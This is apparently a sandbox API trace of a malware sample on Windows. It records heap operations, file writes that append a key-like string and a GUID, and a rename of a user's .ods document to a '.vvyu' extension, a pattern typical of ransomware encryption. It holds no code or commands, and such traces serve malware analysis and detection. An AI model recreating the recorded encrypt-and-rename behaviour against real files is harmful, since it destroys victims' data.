[0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.944] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a060 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0194.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.947] GetCurrentThreadId () returned 0x264 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cceb0 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.948] GetCurrentThreadId () returned 0x264 [0194.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0194.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a108 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a120 [0194.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0194.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0194.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0194.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a108 | out: hHeap=0x6a0000) returned 1 [0194.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0194.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e318 | out: hHeap=0x6a0000) returned 1 [0194.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x6a0000) returned 1 [0194.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0194.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.960] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x4f43, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x4f43, lpOverlapped=0x0) returned 1 [0194.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.961] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x4f48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.961] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.962] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.963] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.963] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.963] CloseHandle (hObject=0x52c) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x7599e8 [0194.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0194.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7599e8 | out: hHeap=0x6a0000) returned 1 [0194.965] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\S7akFO0_2kX867.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\hltcx olpb7aqb0\\s7akfo0_2kx867.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\hlTCx olpB7AQb0\\S7akFO0_2kX867.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\hltcx olpb7aqb0\\s7akfo0_2kx867.ods.vvyu")) returned 1 [0194.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0194.967] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0194.970] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f91000, ftCreationTime.dwHighDateTime=0x1d89842, ftLastAccessTime.dwLowDateTime=0x1e6fd010, ftLastAccessTime.dwHighDateTime=0x1d8a3d7, ftLastWriteTime.dwLowDateTime=0x1e6fd010, ftLastWriteTime.dwHighDateTime=0x1d8a3d7, nFileSizeHigh=0x0, nFileSizeLow=0x4f48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S7akFO0_2kX867.ods", cAlternateFileName="S7AKFO~1.ODS")) returned 0 [0194.970] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0194.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.971] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b550 [0194.971] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 